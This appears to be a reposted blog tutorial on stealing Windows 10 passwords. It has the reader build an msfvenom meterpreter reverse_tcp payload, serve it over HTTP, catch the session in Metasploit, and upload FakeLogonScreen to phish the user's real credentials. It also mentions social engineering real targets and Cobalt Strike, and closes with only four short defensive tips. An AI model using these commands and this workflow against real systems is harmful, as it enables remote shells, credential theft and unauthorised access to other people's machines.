Hacking Windows 10 Password using FakeLogonScreen

This article was posted on ehacking.net

Hacking Windows 10 password is an exciting topic and asked by many people on the group, so I decided to make this windows hacking tutorial.

I will use FakeLogonScreen and Kali Linux to hack Windows 10 passwords. FakelogonScreen is a handy and stealthy tool that creates a fake Log on-screen on a target machine running Windows 10. This tool enforces the target user to enter the correct credentials and, after getting it, passes it to the backdoor attacker.

Arris Huijgen developed this useful tool, it takes advantage of the normal behavior of the Windows environment, displaying the login screen when it comes out of sleep mode, and asking to enter credentials. At that time, this tool looked for phishing Windows credentials from the target, and the strength of this tool came in when it only accepts the valid credentials.

Steps to Hack Windows 10 Password

Now let’s try this tool and perform the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment, the Kali (attacking machine) has an IP:, and the Windows (target machine) got

Download the FakeLogonScreen in Kali Linux

First, we need to download the FakeLogonScreen executable in our attacking machine from the link:


Now assume the target machine is connected to the same network as the attacking machine.

Creating the Malicious Payload to Hack Windows

We will create a malicious payload by using msfvenom tool according to the information acquired by the target system. We will set lhost to our Kali’s IP i.e., and set lport as 4444. Since we are interested in exploiting a Windows system, we will generate a payload as an executable file to easily gets it executed on the target machine. Use command:

# msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe >> payload.exe

Here the ‘payload.exe’ is the name of the generated payload. After that, we will run Python One-liner to create an HTTP server that will host this malicious payload at port 80 of the target machine.

#python -m SimpleHTTPServer 80

Download the Payload on Target Machine

All set now, the most crucial stage came when we have to get the target to download this malicious payload. In real-life scenarios, an attacker can use different social engineering techniques and let the target user to download this malicious file into his system.

For practical demonstration, we will access our Kali’s machine directory from the Windows machine and download the payload.

This will also be showing the current logs in our Kali machine.

Launch Metasploit to Exploit

Let’s get straight back to Kali and launch Metasploit-framework.

Use multi/handler module.

Set the windows/meterpreter/reverse_tcp payload.

Set lhost as our IP i.e. and lport as 4444

After configuring it all, just run the exploit, go back to the Windows machine and run the executable, i.e., ‘payload.exe’. This will quickly get us a meterpreter session.

Upload the Executable

Now upload the FakeLogonScreen executable that we downloaded earlier. Make sure to give it the correct path of the exe file.

>upload /root/Downloads/FakeLogonScreen.exe

After that, get the shell access and run FakeLogonScreen.exe as showing below:

And BOOM!! At the target machine, all the running windows would get closed, and the logon screen would pop up, asking the credentials and appears it as a legitimate window. The user would not hesitate for a second to enter his credentials and get his work back.

To check the strength of this tool, we will be entering the wrong password.

And this will show the error “The password is incorrect, try again.” This is the strength of FakeLogonScreen tool that enforces a target to enter his correct password. The user has no choice other than that to enter his password.

Let’s enter the correct password, and you will get your standard window as nothing happened before.

This also showing the FakeLogonScreen works similar to a keylogger. The attacker would easily monitor all the logs and could grab the correct password of the target user.

Some Useful Information

This tool could also work effectively on multiple desktop systems. While running it on various desktops, all the affected screens turn black immediately after executing the exploit from the attacking machine. This works even if the target user has set a customized background.

The zip file of the exploit also includes another executable named “FakeLogonScreenToFile.exe” that works the same as the previous executable. Still, it has some extra features i.e., not only showing the password but also stores it in a file %LOCALAPPDATA%\Microsoft\user.db.

This tool can also be integrated with Cobalt Strike to work effectively.


  1. Make sure to verify every download source
  2. Beware of Phishing hunting from the unknowns
  3. Check all the links correctly on the Login Screen
  4. Change your passwords after some time



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Irfan Shakeel

Cyber security researcher @InfosecEdu @Alienvault #Tech writer @HuffingtonPost @developerWorks Author of 7-Weeks OSINT Program. CEO & Founder of @ehackingdotnet